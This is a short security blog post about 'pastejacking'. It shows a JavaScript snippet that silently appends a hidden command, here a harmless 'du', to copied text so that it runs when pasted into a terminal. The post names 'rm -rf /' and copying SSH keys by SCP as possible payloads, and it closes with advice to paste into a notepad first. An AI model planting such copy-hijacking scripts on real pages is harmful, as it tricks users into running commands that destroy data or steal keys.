Malicious Copy and Paste Appending

Earlier today I was reading this article on Rollingstone.com about how FXX plans to show all 552 episodes of The Simpson’s this August and noticed when I copied anything from the website it appends a link and copyright notice.  That got me thinking about what else could be appended to copied text and how bad guys could use.

So after a little looking around I found this JavaScript that will append text to anything copied.  To test my theory out I setup a secondary tumblr account called badcopypaste.tumblr.com and added this javascript to the head of the document:

javascript<script type=“text/javascript”>
function addLink() {
    var body_element = document.getElementsByTagName(‘body’)[0];
    var selection;
    selection = window.getSelection();
        var pagelink = “<br></br> du <br></br> ; // change this if you want
    var copytext = selection + pagelink;
    var newdiv = document.createElement(‘div’);
    newdiv.style.position=’absolute’;
    newdiv.style.left=’-99999px’;
    body_element.appendChild(newdiv);
    newdiv.innerHTML = copytext;
    selection.selectAllChildren(newdiv);
    window.setTimeout(function() {
        body_element.removeChild(newdiv);
    },0);
}
document.oncopy = addLink;
</script>

and posted this post:

image

When you copy and paste the echo $PATH command in Firefox and Chrome you get this:

echo $PATH

du

If you copy and paste directly into a terminal window you get this:

In the javascript I added a non-malicious DU command as an example. You cant see it until you already pasted it and it could just as easily been rm -rf / or a command to SCP all your SSH keys to "The Bad Guys™”.

That is why it is always a good idea to paste all commands into a notepad and not directly into a terminal and a dumb idea to let javascript add information to your clipboard.

Site Footer